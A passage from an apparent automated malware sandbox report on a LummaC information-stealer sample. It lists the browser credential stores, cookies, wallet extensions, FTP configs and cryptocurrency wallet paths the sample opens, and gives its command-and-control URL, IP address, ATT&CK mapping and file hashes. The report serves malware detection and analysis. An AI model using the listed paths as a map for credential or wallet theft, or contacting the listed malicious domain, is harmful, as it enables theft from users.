      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqliteJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
      Tries to harvest and steal ftp login credentials
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
      Tries to steal Crypto Currency Wallets
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\370821\Sale.comDirectory queried: C:\Users\user\DocumentsJump to behavior

      Remote Access Functionality

      barindex
      Yara detected LummaC Stealer
      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts21
      Windows Management Instrumentation      		1
      DLL Side-Loading      		12
      Process Injection      		11
      Masquerading      		2
      OS Credential Dumping      		11
      Security Software Discovery      		Remote Services11
      Input Capture      		11
      Encrypted Channel      		Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault Accounts1
      Native API      		Boot or Logon Initialization Scripts1
      DLL Side-Loading      		11
      Virtualization/Sandbox Evasion      		11
      Input Capture      		11
      Virtualization/Sandbox Evasion      		Remote Desktop Protocol1
      Archive Collected Data      		2
      Non-Application Layer Protocol      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)12
      Process Injection      		Security Account Manager3
      Process Discovery      		SMB/Windows Admin Shares31
      Data from Local System      		13
      Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Deobfuscate/Decode Files or Information      		NTDS13
      File and Directory Discovery      		Distributed Component Object Model1
      Clipboard Data      		Protocol ImpersonationTraffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Obfuscated Files or Information      		LSA Secrets25
      System Information Discovery      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading      		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      LVDdWBGnVE.exe49%VirustotalBrowse
      LVDdWBGnVE.exe42%ReversingLabsWin32.Ransomware.LummaC

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\370821\Sale.com0%ReversingLabs

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      https://fannleadyn.click/api100%Avira URL Cloudmalware

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      fannleadyn.click
      		104.21.63.229
      		truetrue
        		unknown
        wcCUGXykADNzZuDCbIFIvizjQpm.wcCUGXykADNzZuDCbIFIvizjQpm
        		unknown
        		unknownfalse
          		unknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          https://fannleadyn.click/apitrue
          • Avira URL Cloud: malware
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://www.autoitscript.com/autoit3/XLVDdWBGnVE.exe, 00000000.00000002.2132831072.0000000000420000.00000004.00000001.01000000.00000003.sdmp, Sale.com, 0000000B.00000000.2156670800.00000000008C5000.00000002.00000001.01000000.00000007.sdmp, Sale.com.2.dr, Ejaculation.0.drfalse
            		high
            http://nsis.sf.net/NSIS_ErrorErrorLVDdWBGnVE.exefalse
              		high
              https://www.autoitscript.com/autoit3/Sale.com.2.dr, Marijuana.0.drfalse
                		high

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                104.21.63.229
                		fannleadyn.clickUnited States
                		13335CLOUDFLARENETUStrue

                General Information

                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1580297
                Start date and time:2024-12-24 08:56:55 +01:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 5m 42s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:17
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:LVDdWBGnVE.exe
                renamed because original name is a hash value
                Original Sample Name:5a909c9769920208ed3d4d7279f08de5.exe
                Detection:MAL
                Classification:mal100.troj.spyw.evad.winEXE@22/21@2/1
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 27
                • Number of non-executed functions: 38
                Cookbook Comments:
                • Found application associated with file extension: .exe

                Warnings

                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                • Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.245.163.56
                • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                • Not all processes where analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                Simulations

                Behavior and APIs

                TimeTypeDescription
                02:57:46API Interceptor1x Sleep call for process: LVDdWBGnVE.exe modified
                02:58:26API Interceptor20x Sleep call for process: Sale.com modified

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                104.21.63.229fkawMJ7FH8.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RedLine, StealcBrowse
                  Full_Ver_Setup.exeGet hashmaliciousLummaCBrowse
                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                      'Setup.exeGet hashmaliciousLummaC StealerBrowse
                        http://cabonusoffer.com/track/Get hashmaliciousUnknownBrowse

                          Domains

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          fannleadyn.clickfkawMJ7FH8.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RedLine, StealcBrowse
                          • 104.21.63.229
                          Full_Ver_Setup.exeGet hashmaliciousLummaCBrowse
                          • 104.21.63.229

                          ASNs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          CLOUDFLARENETUSO5Vg1CJsxN.exeGet hashmaliciousLummaC, StealcBrowse
                          • 104.21.36.201
                          2oM46LNCOo.exeGet hashmaliciousLummaCBrowse
                          • 172.67.199.72
                          J18uCKmoAw.exeGet hashmaliciousLummaCBrowse
                          • 172.67.209.202
                          y001L6lEK4.exeGet hashmaliciousLummaC, StealcBrowse
                          • 172.67.199.72
                          tTGxYWtjG5.exeGet hashmaliciousLummaCBrowse
                          • 172.67.199.72
                          iaLId0uLUw.exeGet hashmaliciousLummaCBrowse
                          • 172.67.199.72
                          4W3cB5WEYH.exeGet hashmaliciousLummaCBrowse
                          • 104.21.36.201
                          ElmEHL9kP9.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                          • 172.67.199.72
                          yuij5p5p3W.exeGet hashmaliciousLummaCBrowse
                          • 104.21.36.201
                          yO9EAqDV15.exeGet hashmaliciousLummaCBrowse
                          • 172.67.199.72

                          JA3 Fingerprints

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          a0e9f5d64349fb13191bc781f81f42e1O5Vg1CJsxN.exeGet hashmaliciousLummaC, StealcBrowse
                          • 104.21.63.229
                          2oM46LNCOo.exeGet hashmaliciousLummaCBrowse
                          • 104.21.63.229
                          J18uCKmoAw.exeGet hashmaliciousLummaCBrowse
                          • 104.21.63.229
                          y001L6lEK4.exeGet hashmaliciousLummaC, StealcBrowse
                          • 104.21.63.229
                          tTGxYWtjG5.exeGet hashmaliciousLummaCBrowse
                          • 104.21.63.229
                          iaLId0uLUw.exeGet hashmaliciousLummaCBrowse
                          • 104.21.63.229
                          4W3cB5WEYH.exeGet hashmaliciousLummaCBrowse
                          • 104.21.63.229
                          ElmEHL9kP9.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                          • 104.21.63.229
                          yuij5p5p3W.exeGet hashmaliciousLummaCBrowse
                          • 104.21.63.229
                          yO9EAqDV15.exeGet hashmaliciousLummaCBrowse
                          • 104.21.63.229

                          Dropped Files

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          C:\Users\user\AppData\Local\Temp\370821\Sale.comeMBO6wS1b5.exeGet hashmaliciousLummaC StealerBrowse
                            Setup.exeGet hashmaliciousLummaC StealerBrowse
                              AxoPac.exeGet hashmaliciousLummaCBrowse
                                Setup.exeGet hashmaliciousLummaCBrowse
                                  Setup.exeGet hashmaliciousLummaCBrowse
                                    fkawMJ7FH8.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RedLine, StealcBrowse
                                      ChoForgot.exeGet hashmaliciousVidarBrowse
                                        94e.exeGet hashmaliciousRemcosBrowse
                                          94e.exeGet hashmaliciousRemcosBrowse
                                            0442.pdf.exeGet hashmaliciousRemcosBrowse

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Temp\370821\Sale.com

                                              Download File
                                              Process:C:\Windows\SysWOW64\cmd.exe
                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Category:modified
                                              Size (bytes):947288
                                              Entropy (8bit):6.630612696399572
                                              Encrypted:false
                                              SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                              MD5:62D09F076E6E0240548C2F837536A46A
                                              SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                              SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                              SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Joe Sandbox View:
                                              • Filename: eMBO6wS1b5.exe, Detection: malicious, Browse
                                              • Filename: Setup.exe, Detection: malicious, Browse
                                              • Filename: AxoPac.exe, Detection: malicious, Browse
                                              • Filename: Setup.exe, Detection: malicious, Browse
                                              • Filename: Setup.exe, Detection: malicious, Browse
                                              • Filename: fkawMJ7FH8.exe, Detection: malicious, Browse
                                              • Filename: ChoForgot.exe, Detection: malicious, Browse
                                              • Filename: 94e.exe, Detection: malicious, Browse
                                              • Filename: 94e.exe, Detection: malicious, Browse
                                              • Filename: 0442.pdf.exe, Detection: malicious, Browse
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Local\Temp\370821\w

                                              Download File
                                              Process:C:\Windows\SysWOW64\cmd.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):455773
                                              Entropy (8bit):7.999611378958578
                                              Encrypted:true
                                              SSDEEP:12288:jxCQzRCdIiSYC3HGWze0kPuJxIv2B6xmDLnd3NBTsKKm:jxCQzcdIi43Hg0ljIu6KLd3Pem
                                              MD5:D02F356CC528BF6EAA89051942A0B1BE
                                              SHA1:DFECB4AE80274697F0D86E497CD566020EA23739
                                              SHA-256:5ED7E1F92A6BB08458CA99FDC83236095845F5939C6B9F7E423C6DB70869B95C
                                              SHA-512:91EC78343E91DB20EDF97F39C293A5A8A45851C510AD6499C85B26738DFD9E918EDDA14E8710ECE22D855D51D1417E722F19530CE3979E491C2B0DCCB5198E57
                                              Malicious:false
